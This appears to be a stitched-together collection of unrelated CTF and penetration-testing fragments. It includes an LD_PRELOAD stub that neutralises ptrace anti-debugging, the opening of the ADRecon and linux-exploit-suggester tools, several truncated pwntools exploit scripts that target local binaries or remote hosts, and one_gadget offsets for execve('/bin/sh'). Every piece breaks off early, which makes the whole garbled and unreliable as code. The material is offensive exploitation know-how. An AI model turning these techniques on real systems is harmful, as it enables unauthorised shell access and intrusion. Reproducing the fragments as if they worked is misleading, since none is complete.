1: create and compile this code
long ptrace(int request, int pid, void *addr, void *data) {
    return 0;
}
#gcc -shared ptrace.c -o ptrace.so
2: set this env variable in both shell and gdb :
export LD_PRELOAD=./ptrace.so

#IS THAT A REV CHALLENGE
local20 = "deadbeef"
local10 = 0x1505
counter = 0
while(counter < len(local20)):

<#
.SYNOPSIS
    ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.
.DESCRIPTION
    ADRecon is a tool which extracts and combines various artefacts (as highlighted below) out of an AD environment. The information can be presented in a specially formatted Microsoft Excel report that includes summary views with metrics to facilitate analysis and provide a holistic picture of the current state of the target AD environment.
    The tool is useful to various classes of security professionals like auditors, DFIR, students, administrators, etc. It can also be an invaluable post-exploitation tool for a penetration tester.

#!/usr/bin/python
from pwn import *
r = process("./defi3")
def allocate(nom,idx):
    r.sendline("1")

#!/bin/bash
#
# Copyright (c) 2016-2018
#
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it
# under the terms of the GNU General Public License. See LICENSE
# file for usage of this software.
#

from pwn import *
r = process("/root/pwnvm/challs/rootit/ch38")
pause()
def new(data):
    r.sendline("new {}".format(data))
    r.recvuntil(">")

from pwn import *
import sys
#r = process("./army")
HOST=sys.argv[1]
PORT=sys.argv[2]
r = remote(HOST,int(PORT))
libc = ELF("libc.so.6")

0x46428 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL
0x4647c execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL
0xe5765 execve("/bin/sh", rsp+0x50, environ)

from pwn import *
import sys
###################################
# HITCON CTF - BFX HEAP - HOUSE OF FORCE
###################################
r = remote(sys.argv[1],int(sys.argv[2]))
pause()